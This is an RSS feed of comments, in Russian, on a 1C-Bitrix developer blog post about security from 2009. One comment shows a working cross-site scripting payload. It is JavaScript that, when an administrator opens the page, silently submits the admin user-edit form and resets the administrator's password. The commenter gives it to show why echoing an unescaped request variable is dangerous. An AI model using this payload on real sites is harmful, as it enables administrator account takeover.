<?xml version="1.0" encoding="utf-8"?>

<rss version="2.0">
 <channel>
	<title>Комментарии в блоге "Вести производства" на "Версия 8.0: Защищаемся"</title>
	<description>Комментарии в блоге "Вести производства" на "Версия 8.0: Защищаемся"</description>
	<link>http://dev.1c-bitrix.ru/community/blogs/dev/893.php</link>
	<language>ru</language>
	<docs>http://backend.userland.com/rss2</docs>
	<pubDate>Fri, 10 Apr 2026 04:29:10 +0300</pubDate>

    <item>
      <title>Комментарии на "Версия 8.0: Защищаемся" от Никита Романов</title>
      <description><![CDATA[Именно по этому надо при смене чувствительной информации запрашивать действующий пароль...]]></description>
      <link>http://dev.1c-bitrix.ru/community/blogs/dev/893.php?commentId=5730#com5730</link>
      <guid>http://dev.1c-bitrix.ru/community/blogs/dev/893.php?commentId=5730#com5730</guid>
      <pubDate>Thu, 30 Apr 2009 21:59:30 +0400</pubDate>
    </item>

    <item>
      <title>Комментарии на "Версия 8.0: Защищаемся" от Yury Tushinsky</title>
      <description><![CDATA[Например, если в этой переменной будет примерно такой код, и на нее зайдет Администратор, то я могу поменять у него пароль на свой (код для FF): &nbsp; &nbsp;<br />
====code====
<pre>&#60;script&#62;&nbsp;&nbsp;&nbsp;&nbsp;
top.jsAdminCalendar = {};&nbsp;&nbsp;&nbsp;&nbsp;
var ifr = document.createElement("IFRAME");&nbsp;&nbsp;&nbsp;&nbsp;
ifr.src = "/bitrix/admin/user_edit.php?ID=1";&nbsp;&nbsp;&nbsp;&nbsp;
ifr.onload = function (e)&nbsp;&nbsp;&nbsp;&nbsp;
{&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp; this.contentDocument.forms&#91;0&#93;.NEW_PASSWORD.value = "123456";&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp; //this.contentDocument.forms&#91;0&#93;.NEW_PASSWORD_CONFIRM.value = "123456";&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp; this.onload = null;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp; this.contentDocument.forms&#91;0&#93;.submit();&nbsp;&nbsp;&nbsp;&nbsp;
}&nbsp;&nbsp;&nbsp;&nbsp;
document.body.appendChild(ifr);&nbsp;&nbsp;&nbsp;&nbsp;
&#60;/script&#62;</pre>
=============
 &nbsp; &nbsp;<br /> &nbsp; &nbsp;<br />Внизу вылезет фрэйм с сообщением об ошибке не совпадения паролей (т.к. эта строка закомментирована). &nbsp; &nbsp;<br /> &nbsp; &nbsp;<br />Вообще говоря, в таком случае я смогу сделать почти тоже самое что и вы со своего браузера (ну плюс к тому же похищать куки, перехватывать пароли, и т.п.). &nbsp;<br />Выражение &lt;?=$_REQUEST[&quot;var&quot;]?&gt; - это как широко распахнутые ворота вашего сайта для хакеров  <img src="http://dev.1c-bitrix.ru/upload/main/smiles/3/bx_smile_wink.png" border="0" data-code=";)" data-definition="UHD" alt=";)" style="width:20px;height:20px;" title="Шутливо" class="bx-smile" /> &nbsp;]]></description>
      <link>http://dev.1c-bitrix.ru/community/blogs/dev/893.php?commentId=5601#com5601</link>
      <guid>http://dev.1c-bitrix.ru/community/blogs/dev/893.php?commentId=5601#com5601</guid>
      <pubDate>Thu, 23 Apr 2009 18:04:27 +0400</pubDate>
    </item>

    <item>
      <title>Комментарии на "Версия 8.0: Защищаемся" от Александр Сосновский</title>
      <description><![CDATA[Можете привести пример, что должно быть в $_REQUEST["var"],<br />чтобы конструкция<br />&lt;?=$_REQUEST["var"]?&gt;<br />была опасной?]]></description>
      <link>http://dev.1c-bitrix.ru/community/blogs/dev/893.php?commentId=5600#com5600</link>
      <guid>http://dev.1c-bitrix.ru/community/blogs/dev/893.php?commentId=5600#com5600</guid>
      <pubDate>Thu, 23 Apr 2009 16:20:05 +0400</pubDate>
    </item>

    <item>
      <title>Комментарии на "Версия 8.0: Защищаемся" от Иван Сергеев</title>
      <description><![CDATA[Тоже долго удивлялся, почему за все время жизни моего компьютера у меня не стояло ни одного антивирусника, и все было в порядке! А у других установлены последние обновления антивирусных баз и не помогает! &nbsp;<img src="http://dev.1c-bitrix.ru/upload/main/smiles/3/bx_smile_smile.png" border="0" data-code=":)" data-definition="UHD" alt=":)" style="width:20px;height:20px;" title="С улыбкой" class="bx-smile" /> <br /><br />Не по теме, но. Текст не удобно читать. Глаза со строчки на строчку прыгают...]]></description>
      <link>http://dev.1c-bitrix.ru/community/blogs/dev/893.php?commentId=5597#com5597</link>
      <guid>http://dev.1c-bitrix.ru/community/blogs/dev/893.php?commentId=5597#com5597</guid>
      <pubDate>Thu, 23 Apr 2009 13:35:43 +0400</pubDate>
    </item>

  </channel>
</rss>